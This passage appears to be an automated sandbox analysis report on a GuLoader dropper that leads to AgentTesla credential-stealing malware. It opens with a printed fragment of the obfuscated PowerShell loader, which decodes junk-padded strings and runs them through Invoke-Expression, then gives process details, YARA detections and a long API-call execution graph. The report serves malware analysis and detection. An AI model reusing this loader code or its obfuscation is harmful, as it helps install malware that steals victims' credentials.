CDDr0Fu5Va1IsBMi1NoEPr1MiDOp0 A6Ma1BlAMo0Sy7De0Su0Hy0 TF H4Fa2De4BnEPl4UdATa3VuEUd0Re1Or1BrDCo0tr7Sp1DeAIn0An7Fa0Me1ov0Ek0 E0OrBGa1JuC B4Hl7Le'se; R&Fi(Le`$ HSEua MwChwReo JrStkBaeParDi8Gr5Pe7Ar)Sp Eu`$miDapiPls Bl PoyoaMedis1Un;Da`$CaDSaiDisDelGlo naPad O2 N w=Op TrPDeyFuxCai EdTreFusCo4 d Cy'Fo4StASt3ExD P1StA A0ShBJa0GeF S0UnApo1udD N4WaEDe5Sy3Ta4arEOb3 W5Es3BeD Y1 e7In1BuDCh1SuABe0trBVi0fr3Bo4Ox0Re3 KCSy1 TB B0In0 F1noAUn0Si7He0Di3Tu0SeBIm4br0Sk2 g7Da0Pr0Pe1ToAru0 BBVa1HaC M0Vi1Ma1CoEUn3HaDCe0PhBYt1GuC B1Cl8Co0Te7St0TrDJa0FiB T1SaD F4 F0 P2Ba3Le0InFAr1HuCEx1ImDOp0No6 
U0OsFMa0Pe2He3Fl3Li5De4 O5Os4Sp2Fo9Al0RaB B1TiASk2 SADr0 TBSl0 s2No0AaBSa0en9De0StFFo1 KARe0OeBph2He8as0Sm1Kr1SiCQu2gr8Po1FaBbe0 P0Li0 ADRi1PoA A0ju7ev0Va1Sp0Ru0Gl3 FEPr0Mi1Sc0La7Al0Tu0Gi1AnACi0VoB C1 FC A4Re6ch4 S6Tr0Su8Kv0Co5St1SyEGo4GrENo4KaACr2pr0Sp0Zy1Ab1CoB N0Na3Pi0LiBEf0Le0Gr0Ut7Vi1BeDpr0 O3Pe4FlEOp4FrA F2blAko0Ch7 D0Tr3St0Un7An0in0Vg1FyB D1 HAMe0 L7Am1Do8In0 SBPn1BuCMa0Ko0Ic0MuBRa4Gu7Fa4Vv2Ac4 kE N4Vi6Fa2 I9Am2DeAWe3SoAob4 VEJo2EnEsk4An6Vo3Co5Un2Ho7Me0Ga0Sy1 BAOe3KuESm1 BAWa1DoCIn3to3Ro4 S2 T4HoEFo3 D5 S2Di7Pr0In0Fo1NaASt3AaEFi1NoABa1SuCUn3 F3Pl4 a2Ar4peEfi3Kl5Co2 T7Re0Bi0In1DoAch3BaESl1 SAOu1 DC T3Su3Pu4Tr2An4PaEch3Cy5 B2Di7Kn0Re0To1teAre3AuELi1StA T1SlCFa3 J3Dm4Ga2Un4 UESe3Pr5 F2 C7 K0My0Ho1BuAPe3 HEUh1 HABe1 HC H3 s3Ch4Mi7Ov4ExEFo4Hn6Un3 S5Co2Sv7 M0St0Ca1ToAPe3ovEOm1 SA T1AfCBo3 S3Pe4Gl7Ne4Ga7Kv4St7Un' I;Ri&De( U`$BrSInaBlwPrwVaoVar Uk UeSjrKk8 R5 B7He) M Ch`$VeDStiBls Ml BounaAwdOp2Nr; A`$ CDChiSusNolStoTaaAkdRe3Fo Ub=ci NePLeyTix Ei SdTieThs N4Al Ka' I4 sA S3OvDTr1 LAHy0KeBUn0UnF T0PrA N1StDSt4Si0At2 Y7Sy0Kv0 S1Te8Un0Bi1Py0La5Cu0SyBBi4 P6bl4TrA P3 S9Ra0As7Kr0 o0 W1InAWe0DeBHa1toC B1Ph9Mo0ByBVo0MaBWh0PrARe5FlASt5GeDTr4Ra2Sm4FoAAa3ElDIc0Bu5Tr1 MBki1SoESl1 HDLa0Ny6Sa1EmAca0 S7 L0La0Dy0BjFRu4Ok2Aa4 MAPr2Kn1De1NiBSt0 RA A0StBUr0Me3 S0pr7Re0AfFSa0no0Ma4Un2Tr5 LESp4In2Bu5UpE R4Qu7 T'Th;Ba&Po( O`$ PSHaa AwTewBaoBirFikOceUdrru8Kl5Ho7 B)Br Ma`$StDAdiInsEtlCaoReaModSk3Af#Wi;""";<#Mageskifterne Tarwood Setiferous Stokvrker skillevej Saudiere #>;;function xorami ($Indbyggedes,$Magnetbelgning240) { &$Flagellanten0 (Disload9 'Fl$TeIabnInd CbPeyUngangMeeSkdPaeAgsHa B-RebhaxTeoderBa Tr$ UMsuaUng snAceCht PbTeeSilMeg Jn MiTanVegMi2Do4 T0Af ');}Function Disload9 { param([String]$Solfald); <#hovedpunkts Restemad Cataloguing Reseeking Commonality celebrating Sportsdirektr #>; For($Nonexpectant=2; $Nonexpectant -lt $Solfald.Length-1; $Nonexpectant+=(2+1+(1-1))){ <#Konditoris Endestation Kolhozy Ataghans Vinkortets #>; $Nonexplosives+=$Solfald.Substring($Nonexpectant, 1)} 
$Nonexplosives;};;$Flagellanten0 = Disload9 'ReIBuE aX B ';$Flagellanten1= Disload9 $Portugals;&$Flagellanten0 $Flagellanten1;<#Temperaturmaalingen Randingerne Kdvarerne Punditries Afkrslen Mocambiquernes Galleriets #>;
                                                                Imagebase:0xf60000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1604051248.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1607101353.0000000008450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1607315520.00000000087AA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:09:02:29
                                                                Start date:24/01/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                Imagebase:0x640000
                                                                File size:262'432 bytes
                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false


                                                                  Execution Graph

                                                                  Execution Coverage:25.1%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:21.5%
                                                                  Total number of Nodes:1337
                                                                  Total number of Limit Nodes:35
                                                                  execution_graph: node and edge data for the interactive graph viewer (1337 nodes, 35 limit nodes). Nodes are function start addresses in the 0x401000-0x407000 range annotated with the Win32 APIs each one calls, among them GetFileAttributesW/CreateFileW, ReadFile/WriteFile/SetFilePointer, GlobalAlloc/GlobalFree, GetTempFileNameW, FindFirstFileW/FindNextFileW, DeleteFileW/MoveFileExW/RemoveDirectoryW, RegOpenKeyExW/RegQueryValueExW, LoadLibraryExW/GetProcAddress/FreeLibrary, CreateProcessW/WaitForSingleObject/GetExitCodeProcess, SHGetSpecialFolderLocation/SHGetPathFromIDListW, SHBrowseForFolderW, GetPrivateProfileStringW, SendMessageTimeoutW/FindWindowExW, MessageBoxIndirectW and CompareFileTime/SetFileTime; the raw adjacency listing is omitted here.
3576 403112 3575->3576 3577 4030f6 SetFilePointer 3575->3577 3596 4031ef GetTickCount 3576->3596 3577->3576 3580 405dd6 ReadFile 3581 403132 3580->3581 3582 4031ef 43 API calls 3581->3582 3586 4018a2 3581->3586 3583 403149 3582->3583 3584 4031b5 ReadFile 3583->3584 3583->3586 3589 403158 3583->3589 3584->3586 3586->3560 3586->3562 3587 405dd6 ReadFile 3587->3589 3588 405e05 WriteFile 3588->3589 3589->3586 3589->3587 3589->3588 3590->3544 3591->3543 3593 4058d8 3592->3593 3594 405924 3593->3594 3595 4058ec MessageBoxIndirectW 3593->3595 3594->3557 3595->3594 3597 403347 3596->3597 3598 40321d 3596->3598 3599 402d9f 33 API calls 3597->3599 3609 40336e SetFilePointer 3598->3609 3605 403119 3599->3605 3601 403228 SetFilePointer 3607 40324d 3601->3607 3605->3580 3605->3586 3606 405e05 WriteFile 3606->3607 3607->3605 3607->3606 3608 403328 SetFilePointer 3607->3608 3610 403358 3607->3610 3613 406697 3607->3613 3620 402d9f 3607->3620 3608->3597 3609->3601 3611 405dd6 ReadFile 3610->3611 3612 40336b 3611->3612 3612->3607 3614 4066bc 3613->3614 3615 4066c4 3613->3615 3614->3607 3615->3614 3616 406754 GlobalAlloc 3615->3616 3617 40674b GlobalFree 3615->3617 3618 4067c2 GlobalFree 3615->3618 3619 4067cb GlobalAlloc 3615->3619 3616->3614 3616->3615 3617->3616 3618->3619 3619->3614 3619->3615 3621 402db0 3620->3621 3622 402dc8 3620->3622 3623 402db9 DestroyWindow 3621->3623 3630 402dc0 3621->3630 3624 402dd0 3622->3624 3625 402dd8 GetTickCount 3622->3625 3623->3630 3626 406594 2 API calls 3624->3626 3627 402de6 3625->3627 3625->3630 3626->3630 3628 402e1b CreateDialogParamW ShowWindow 3627->3628 3629 402dee 3627->3629 3628->3630 3629->3630 3635 402d83 3629->3635 3630->3607 3632 402dfc wsprintfW 3633 4052dd 25 API calls 3632->3633 3634 402e19 3633->3634 3634->3630 3636 402d92 3635->3636 3637 402d94 MulDiv 3635->3637 3636->3637 3637->3632 4374 401ee9 4375 402bbf 18 API calls 4374->4375 4376 401ef0 4375->4376 4377 4064c1 2 API calls 4376->4377 4378 401ef6 4377->4378 4380 401f07 
4378->4380 4381 4060c5 wsprintfW 4378->4381 4381->4380 3638 403d6a 3639 403d82 3638->3639 3640 403ebd 3638->3640 3639->3640 3641 403d8e 3639->3641 3642 403f0e 3640->3642 3643 403ece GetDlgItem GetDlgItem 3640->3643 3644 403d99 SetWindowPos 3641->3644 3645 403dac 3641->3645 3647 403f68 3642->3647 3655 401389 2 API calls 3642->3655 3646 404242 19 API calls 3643->3646 3644->3645 3649 403db1 ShowWindow 3645->3649 3650 403dc9 3645->3650 3651 403ef8 SetClassLongW 3646->3651 3648 40428e SendMessageW 3647->3648 3667 403eb8 3647->3667 3697 403f7a 3648->3697 3649->3650 3652 403dd1 DestroyWindow 3650->3652 3653 403deb 3650->3653 3654 40140b 2 API calls 3651->3654 3707 4041cb 3652->3707 3656 403df0 SetWindowLongW 3653->3656 3657 403e01 3653->3657 3654->3642 3658 403f40 3655->3658 3656->3667 3661 403eaa 3657->3661 3662 403e0d GetDlgItem 3657->3662 3658->3647 3663 403f44 SendMessageW 3658->3663 3659 40140b 2 API calls 3659->3697 3660 4041cd DestroyWindow EndDialog 3660->3707 3664 4042a9 8 API calls 3661->3664 3666 403e20 SendMessageW IsWindowEnabled 3662->3666 3669 403e3d 3662->3669 3663->3667 3664->3667 3665 4041fc ShowWindow 3665->3667 3666->3667 3666->3669 3668 4061a0 18 API calls 3668->3697 3670 403e4a 3669->3670 3671 403e91 SendMessageW 3669->3671 3672 403e5d 3669->3672 3680 403e42 3669->3680 3670->3671 3670->3680 3671->3661 3674 403e65 3672->3674 3675 403e7a 3672->3675 3673 40421b SendMessageW 3676 403e78 3673->3676 3711 40140b 3674->3711 3678 40140b 2 API calls 3675->3678 3676->3661 3681 403e81 3678->3681 3679 404242 19 API calls 3679->3697 3680->3673 3681->3661 3681->3680 3682 404242 19 API calls 3683 403ff5 GetDlgItem 3682->3683 3684 404012 ShowWindow KiUserCallbackDispatcher 3683->3684 3685 40400a 3683->3685 3708 404264 KiUserCallbackDispatcher 3684->3708 3685->3684 3687 40403c EnableWindow 3690 404050 3687->3690 3688 404055 GetSystemMenu EnableMenuItem SendMessageW 3689 404085 SendMessageW 3688->3689 3688->3690 3689->3690 3690->3688 3709 404277 SendMessageW 3690->3709 
3710 40617e lstrcpynW 3690->3710 3693 4040b3 lstrlenW 3694 4061a0 18 API calls 3693->3694 3695 4040c9 SetWindowTextW 3694->3695 3696 401389 2 API calls 3695->3696 3696->3697 3697->3659 3697->3660 3697->3667 3697->3668 3697->3679 3697->3682 3698 40410d DestroyWindow 3697->3698 3699 404127 CreateDialogParamW 3698->3699 3698->3707 3700 40415a 3699->3700 3699->3707 3701 404242 19 API calls 3700->3701 3702 404165 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3701->3702 3703 401389 2 API calls 3702->3703 3704 4041ab 3703->3704 3704->3667 3705 4041b3 ShowWindow 3704->3705 3706 40428e SendMessageW 3705->3706 3706->3707 3707->3665 3707->3667 3708->3687 3709->3690 3710->3693 3712 401389 2 API calls 3711->3712 3713 401420 3712->3713 3713->3680 4382 4021ea 4383 402bbf 18 API calls 4382->4383 4384 4021f0 4383->4384 4385 402bbf 18 API calls 4384->4385 4386 4021f9 4385->4386 4387 402bbf 18 API calls 4386->4387 4388 402202 4387->4388 4389 4064c1 2 API calls 4388->4389 4390 40220b 4389->4390 4391 40221c lstrlenW lstrlenW 4390->4391 4392 40220f 4390->4392 4394 4052dd 25 API calls 4391->4394 4393 4052dd 25 API calls 4392->4393 4396 402217 4392->4396 4393->4396 4395 40225a SHFileOperationW 4394->4395 4395->4392 4395->4396 3726 40156b 3727 401584 3726->3727 3728 40157b ShowWindow 3726->3728 3729 401592 ShowWindow 3727->3729 3730 402a4c 3727->3730 3728->3727 3729->3730 4397 40226e 4398 402275 4397->4398 4402 402288 4397->4402 4399 4061a0 18 API calls 4398->4399 4400 402282 4399->4400 4401 4058c3 MessageBoxIndirectW 4400->4401 4401->4402 4403 4014f1 SetForegroundWindow 4404 402a4c 4403->4404 3735 401673 3736 402bbf 18 API calls 3735->3736 3737 40167a 3736->3737 3738 402bbf 18 API calls 3737->3738 3739 401683 3738->3739 3740 402bbf 18 API calls 3739->3740 3741 40168c MoveFileW 3740->3741 3742 40169f 3741->3742 3748 401698 3741->3748 3743 4064c1 2 API calls 3742->3743 3746 4021e1 3742->3746 3745 4016ae 3743->3745 3744 401423 25 API calls 3744->3746 3745->3746 3747 40601f 38 API 
calls 3745->3747 3747->3748 3748->3744 4405 401cfa GetDlgItem GetClientRect 4406 402bbf 18 API calls 4405->4406 4407 401d2c LoadImageW SendMessageW 4406->4407 4408 401d4a DeleteObject 4407->4408 4409 402a4c 4407->4409 4408->4409 3994 40237b 3995 402381 3994->3995 3996 402bbf 18 API calls 3995->3996 3997 402393 3996->3997 3998 402bbf 18 API calls 3997->3998 3999 40239d RegCreateKeyExW 3998->3999 4000 4023c7 3999->4000 4004 402a4c 3999->4004 4001 4023e2 4000->4001 4002 402bbf 18 API calls 4000->4002 4003 4023ee 4001->4003 4006 402ba2 18 API calls 4001->4006 4005 4023d8 lstrlenW 4002->4005 4007 402409 RegSetValueExW 4003->4007 4008 4030e7 45 API calls 4003->4008 4005->4001 4006->4003 4009 40241f RegCloseKey 4007->4009 4008->4007 4009->4004 4011 4027fb 4012 402bbf 18 API calls 4011->4012 4013 402802 FindFirstFileW 4012->4013 4014 40282a 4013->4014 4018 402815 4013->4018 4015 402833 4014->4015 4019 4060c5 wsprintfW 4014->4019 4020 40617e lstrcpynW 4015->4020 4019->4015 4020->4018 4424 401dfd EnableWindow 4425 402a4c 4424->4425 4426 4014ff 4427 401507 4426->4427 4429 40151a 4426->4429 4428 402ba2 18 API calls 4427->4428 4428->4429 4430 401000 4431 401037 BeginPaint GetClientRect 4430->4431 4433 40100c DefWindowProcW 4430->4433 4434 4010f3 4431->4434 4437 401179 4433->4437 4435 401073 CreateBrushIndirect FillRect DeleteObject 4434->4435 4436 4010fc 4434->4436 4435->4434 4438 401102 CreateFontIndirectW 4436->4438 4439 401167 EndPaint 4436->4439 4438->4439 4440 401112 6 API calls 4438->4440 4439->4437 4440->4439 4448 401904 4449 40193b 4448->4449 4450 402bbf 18 API calls 4449->4450 4451 401940 4450->4451 4452 40596f 69 API calls 4451->4452 4453 401949 4452->4453 4454 402d04 4455 402d16 SetTimer 4454->4455 4456 402d2f 4454->4456 4455->4456 4457 402d7d 4456->4457 4458 402d83 MulDiv 4456->4458 4459 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 4458->4459 4459->4457 4461 403985 4462 403990 4461->4462 4463 403994 4462->4463 4464 403997 GlobalAlloc 4462->4464 4464->4463 4465 
402786 4466 40278d 4465->4466 4469 4029f7 4465->4469 4467 402ba2 18 API calls 4466->4467 4468 402798 4467->4468 4470 40279f SetFilePointer 4468->4470 4470->4469 4471 4027af 4470->4471 4473 4060c5 wsprintfW 4471->4473 4473->4469 4474 401907 4475 402bbf 18 API calls 4474->4475 4476 40190e 4475->4476 4477 4058c3 MessageBoxIndirectW 4476->4477 4478 401917 4477->4478 4479 401e08 4480 402bbf 18 API calls 4479->4480 4481 401e0e 4480->4481 4482 402bbf 18 API calls 4481->4482 4483 401e17 4482->4483 4484 402bbf 18 API calls 4483->4484 4485 401e20 4484->4485 4486 402bbf 18 API calls 4485->4486 4487 401e29 4486->4487 4488 401423 25 API calls 4487->4488 4489 401e30 ShellExecuteW 4488->4489 4490 401e61 4489->4490 4496 404390 lstrlenW 4497 4043b1 WideCharToMultiByte 4496->4497 4498 4043af 4496->4498 4498->4497 4499 401491 4500 4052dd 25 API calls 4499->4500 4501 401498 4500->4501 4509 401a15 4510 402bbf 18 API calls 4509->4510 4511 401a1e ExpandEnvironmentStringsW 4510->4511 4512 401a32 4511->4512 4514 401a45 4511->4514 4513 401a37 lstrcmpW 4512->4513 4512->4514 4513->4514 4515 402515 4516 402bbf 18 API calls 4515->4516 4517 40251c 4516->4517 4520 405d53 GetFileAttributesW CreateFileW 4517->4520 4519 402528 4520->4519 4521 402095 4522 402bbf 18 API calls 4521->4522 4523 40209c 4522->4523 4524 402bbf 18 API calls 4523->4524 4525 4020a6 4524->4525 4526 402bbf 18 API calls 4525->4526 4527 4020b0 4526->4527 4528 402bbf 18 API calls 4527->4528 4529 4020ba 4528->4529 4530 402bbf 18 API calls 4529->4530 4532 4020c4 4530->4532 4531 402103 CoCreateInstance 4536 402122 4531->4536 4532->4531 4533 402bbf 18 API calls 4532->4533 4533->4531 4534 401423 25 API calls 4535 4021e1 4534->4535 4536->4534 4536->4535 4537 401b16 4538 402bbf 18 API calls 4537->4538 4539 401b1d 4538->4539 4540 402ba2 18 API calls 4539->4540 4541 401b26 wsprintfW 4540->4541 4542 402a4c 4541->4542 4543 404696 4544 4046a6 4543->4544 4545 4046cc 4543->4545 4546 404242 19 API calls 4544->4546 4547 4042a9 8 API calls 
4545->4547 4548 4046b3 SetDlgItemTextW 4546->4548 4549 4046d8 4547->4549 4548->4545 3338 40159b 3339 402bbf 18 API calls 3338->3339 3340 4015a2 SetFileAttributesW 3339->3340 3341 4015b4 3340->3341 3342 40541c 3343 4055c6 3342->3343 3344 40543d GetDlgItem GetDlgItem GetDlgItem 3342->3344 3346 4055f7 3343->3346 3347 4055cf GetDlgItem CreateThread FindCloseChangeNotification 3343->3347 3388 404277 SendMessageW 3344->3388 3349 405622 3346->3349 3350 405647 3346->3350 3351 40560e ShowWindow ShowWindow 3346->3351 3347->3346 3411 4053b0 OleInitialize 3347->3411 3348 4054ad 3354 4054b4 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3348->3354 3352 405682 3349->3352 3353 40562e 3349->3353 3397 4042a9 3350->3397 3393 404277 SendMessageW 3351->3393 3352->3350 3363 405690 SendMessageW 3352->3363 3356 405636 3353->3356 3357 40565c ShowWindow 3353->3357 3361 405522 3354->3361 3362 405506 SendMessageW SendMessageW 3354->3362 3394 40421b 3356->3394 3359 40567c 3357->3359 3360 40566e 3357->3360 3367 40421b SendMessageW 3359->3367 3366 4052dd 25 API calls 3360->3366 3368 405535 3361->3368 3369 405527 SendMessageW 3361->3369 3362->3361 3365 405655 3363->3365 3370 4056a9 CreatePopupMenu 3363->3370 3366->3359 3367->3352 3389 404242 3368->3389 3369->3368 3371 4061a0 18 API calls 3370->3371 3373 4056b9 AppendMenuW 3371->3373 3375 4056d6 GetWindowRect 3373->3375 3376 4056e9 TrackPopupMenu 3373->3376 3374 405545 3377 405582 GetDlgItem SendMessageW 3374->3377 3378 40554e ShowWindow 3374->3378 3375->3376 3376->3365 3380 405704 3376->3380 3377->3365 3379 4055a9 SendMessageW SendMessageW 3377->3379 3381 405571 3378->3381 3382 405564 ShowWindow 3378->3382 3379->3365 3383 405720 SendMessageW 3380->3383 3392 404277 SendMessageW 3381->3392 3382->3381 3383->3383 3384 40573d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3383->3384 3386 405762 SendMessageW 3384->3386 3386->3386 3387 40578b GlobalUnlock SetClipboardData CloseClipboard 3386->3387 3387->3365 3388->3348 3390 4061a0 18 API 
calls 3389->3390 3391 40424d SetDlgItemTextW 3390->3391 3391->3374 3392->3377 3393->3349 3395 404222 3394->3395 3396 404228 SendMessageW 3394->3396 3395->3396 3396->3350 3398 4042c1 GetWindowLongW 3397->3398 3408 40434a 3397->3408 3399 4042d2 3398->3399 3398->3408 3400 4042e1 GetSysColor 3399->3400 3401 4042e4 3399->3401 3400->3401 3402 4042f4 SetBkMode 3401->3402 3403 4042ea SetTextColor 3401->3403 3404 404312 3402->3404 3405 40430c GetSysColor 3402->3405 3403->3402 3406 404319 SetBkColor 3404->3406 3407 404323 3404->3407 3405->3404 3406->3407 3407->3408 3409 404336 DeleteObject 3407->3409 3410 40433d CreateBrushIndirect 3407->3410 3408->3365 3409->3410 3410->3408 3418 40428e 3411->3418 3413 4053d3 3417 4053fa 3413->3417 3421 401389 3413->3421 3414 40428e SendMessageW 3415 40540c OleUninitialize 3414->3415 3417->3414 3419 4042a6 3418->3419 3420 404297 SendMessageW 3418->3420 3419->3413 3420->3419 3423 401390 3421->3423 3422 4013fe 3422->3413 3423->3422 3424 4013cb MulDiv SendMessageW 3423->3424 3424->3423 3425 40229d 3426 4022a5 3425->3426 3427 4022ab 3425->3427 3428 402bbf 18 API calls 3426->3428 3429 4022b9 3427->3429 3430 402bbf 18 API calls 3427->3430 3428->3427 3431 4022c7 3429->3431 3432 402bbf 18 API calls 3429->3432 3430->3429 3433 402bbf 18 API calls 3431->3433 3432->3431 3434 4022d0 WritePrivateProfileStringW 3433->3434 4550 401f1d 4551 402bbf 18 API calls 4550->4551 4552 401f24 4551->4552 4553 406558 5 API calls 4552->4553 4554 401f33 4553->4554 4555 401fb7 4554->4555 4556 401f4f GlobalAlloc 4554->4556 4556->4555 4557 401f63 4556->4557 4558 406558 5 API calls 4557->4558 4559 401f6a 4558->4559 4560 406558 5 API calls 4559->4560 4561 401f74 4560->4561 4561->4555 4565 4060c5 wsprintfW 4561->4565 4563 401fa9 4566 4060c5 wsprintfW 4563->4566 4565->4563 4566->4555 3435 40249e 3445 402cc9 3435->3445 3437 4024a8 3438 402ba2 18 API calls 3437->3438 3439 4024b1 3438->3439 3440 4024d5 RegEnumValueW 3439->3440 3441 4024c9 RegEnumKeyW 3439->3441 3442 40281e 
3439->3442 3440->3442 3443 4024ee RegCloseKey 3440->3443 3441->3443 3443->3442 3446 402bbf 18 API calls 3445->3446 3447 402ce2 3446->3447 3448 402cf0 RegOpenKeyExW 3447->3448 3448->3437 4567 40149e 4568 402288 4567->4568 4569 4014ac PostQuitMessage 4567->4569 4569->4568 3478 40231f 3479 402324 3478->3479 3480 40234f 3478->3480 3482 402cc9 19 API calls 3479->3482 3481 402bbf 18 API calls 3480->3481 3484 402356 3481->3484 3483 40232b 3482->3483 3485 402335 3483->3485 3489 40236c 3483->3489 3490 402bff RegOpenKeyExW 3484->3490 3486 402bbf 18 API calls 3485->3486 3487 40233c RegDeleteValueW RegCloseKey 3486->3487 3487->3489 3491 402c93 3490->3491 3494 402c2a 3490->3494 3491->3489 3492 402c50 RegEnumKeyW 3493 402c62 RegCloseKey 3492->3493 3492->3494 3501 406558 GetModuleHandleA 3493->3501 3494->3492 3494->3493 3496 402c87 RegCloseKey 3494->3496 3499 402bff 5 API calls 3494->3499 3498 402c76 3496->3498 3498->3491 3499->3494 3500 402ca2 RegDeleteKeyW 3500->3498 3502 406574 3501->3502 3503 40657e GetProcAddress 3501->3503 3507 4064e8 GetSystemDirectoryW 3502->3507 3505 402c72 3503->3505 3505->3498 3505->3500 3506 40657a 3506->3503 3506->3505 3508 40650a wsprintfW LoadLibraryExW 3507->3508 3508->3506 4570 401ca3 4571 402ba2 18 API calls 4570->4571 4572 401ca9 IsWindow 4571->4572 4573 401a05 4572->4573 4574 402a27 SendMessageW 4575 402a41 InvalidateRect 4574->4575 4576 402a4c 4574->4576 4575->4576 3714 40242a 3715 402cc9 19 API calls 3714->3715 3716 402434 3715->3716 3717 402bbf 18 API calls 3716->3717 3718 40243d 3717->3718 3719 402448 RegQueryValueExW 3718->3719 3722 40281e 3718->3722 3720 402468 3719->3720 3721 40246e RegCloseKey 3719->3721 3720->3721 3725 4060c5 wsprintfW 3720->3725 3721->3722 3725->3721 3731 40172d 3732 402bbf 18 API calls 3731->3732 3733 401734 SearchPathW 3732->3733 3734 40174f 3733->3734 4584 404a33 4585 404a43 4584->4585 4586 404a5f 4584->4586 4595 4058a7 GetDlgItemTextW 4585->4595 4588 404a92 4586->4588 4589 404a65 SHGetPathFromIDListW 4586->4589 
4590 404a7c SendMessageW 4589->4590 4591 404a75 4589->4591 4590->4588 4593 40140b 2 API calls 4591->4593 4592 404a50 SendMessageW 4592->4586 4593->4590 4595->4592 4596 4027b4 4597 4027ba 4596->4597 4598 4027c2 FindClose 4597->4598 4599 402a4c 4597->4599 4598->4599 3749 4033b6 SetErrorMode GetVersion 3750 4033eb 3749->3750 3751 4033f1 3749->3751 3752 406558 5 API calls 3750->3752 3753 4064e8 3 API calls 3751->3753 3752->3751 3754 403407 lstrlenA 3753->3754 3754->3751 3755 403417 3754->3755 3756 406558 5 API calls 3755->3756 3757 40341f 3756->3757 3758 406558 5 API calls 3757->3758 3759 403426 #17 OleInitialize SHGetFileInfoW 3758->3759 3837 40617e lstrcpynW 3759->3837 3761 403463 GetCommandLineW 3838 40617e lstrcpynW 3761->3838 3763 403475 GetModuleHandleW 3764 40348d 3763->3764 3765 405b5f CharNextW 3764->3765 3766 40349c CharNextW 3765->3766 3767 4035c6 GetTempPathW 3766->3767 3777 4034b5 3766->3777 3839 403385 3767->3839 3769 4035de 3770 4035e2 GetWindowsDirectoryW lstrcatW 3769->3770 3771 403638 DeleteFileW 3769->3771 3772 403385 12 API calls 3770->3772 3849 402e41 GetTickCount GetModuleFileNameW 3771->3849 3775 4035fe 3772->3775 3773 405b5f CharNextW 3773->3777 3775->3771 3778 403602 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3775->3778 3776 40364c 3779 403703 ExitProcess OleUninitialize 3776->3779 3785 4036ef 3776->3785 3787 405b5f CharNextW 3776->3787 3777->3773 3782 4035b1 3777->3782 3784 4035af 3777->3784 3783 403385 12 API calls 3778->3783 3780 403839 3779->3780 3781 403719 3779->3781 3790 403841 GetCurrentProcess OpenProcessToken 3780->3790 3791 4038bd ExitProcess 3780->3791 3789 4058c3 MessageBoxIndirectW 3781->3789 3935 40617e lstrcpynW 3782->3935 3792 403630 3783->3792 3784->3767 3879 4039c7 3785->3879 3802 40366b 3787->3802 3795 403727 ExitProcess 3789->3795 3796 403859 LookupPrivilegeValueW AdjustTokenPrivileges 3790->3796 3797 40388d 3790->3797 3792->3771 3792->3779 3793 4036ff 3793->3779 3796->3797 3798 406558 5 API calls 
3797->3798 3801 403894 3798->3801 3799 4036c9 3804 405c3a 18 API calls 3799->3804 3800 40372f 3938 405846 3800->3938 3805 4038a9 ExitWindowsEx 3801->3805 3806 4038b6 3801->3806 3802->3799 3802->3800 3808 4036d5 3804->3808 3805->3791 3805->3806 3809 40140b 2 API calls 3806->3809 3808->3779 3936 40617e lstrcpynW 3808->3936 3809->3791 3810 403750 lstrcatW lstrcmpiW 3810->3779 3812 40376c 3810->3812 3811 403745 lstrcatW 3811->3810 3814 403771 3812->3814 3815 403778 3812->3815 3941 4057ac CreateDirectoryW 3814->3941 3946 405829 CreateDirectoryW 3815->3946 3816 4036e4 3937 40617e lstrcpynW 3816->3937 3820 40377d SetCurrentDirectoryW 3822 403798 3820->3822 3823 40378d 3820->3823 3950 40617e lstrcpynW 3822->3950 3949 40617e lstrcpynW 3823->3949 3826 4061a0 18 API calls 3827 4037d7 DeleteFileW 3826->3827 3828 4037e4 CopyFileW 3827->3828 3834 4037a6 3827->3834 3828->3834 3829 40382d 3830 40601f 38 API calls 3829->3830 3832 403834 3830->3832 3831 40601f 38 API calls 3831->3834 3832->3779 3833 4061a0 18 API calls 3833->3834 3834->3826 3834->3829 3834->3831 3834->3833 3835 40585e 2 API calls 3834->3835 3836 403818 CloseHandle 3834->3836 3835->3834 3836->3834 3837->3761 3838->3763 3840 406412 5 API calls 3839->3840 3842 403391 3840->3842 3841 40339b 3841->3769 3842->3841 3843 405b32 3 API calls 3842->3843 3844 4033a3 3843->3844 3845 405829 2 API calls 3844->3845 3846 4033a9 3845->3846 3847 405d82 2 API calls 3846->3847 3848 4033b4 3847->3848 3848->3769 3951 405d53 GetFileAttributesW CreateFileW 3849->3951 3851 402e84 3878 402e91 3851->3878 3952 40617e lstrcpynW 3851->3952 3853 402ea7 3854 405b7e 2 API calls 3853->3854 3855 402ead 3854->3855 3953 40617e lstrcpynW 3855->3953 3857 402eb8 GetFileSize 3858 402fb9 3857->3858 3876 402ecf 3857->3876 3859 402d9f 33 API calls 3858->3859 3861 402fc0 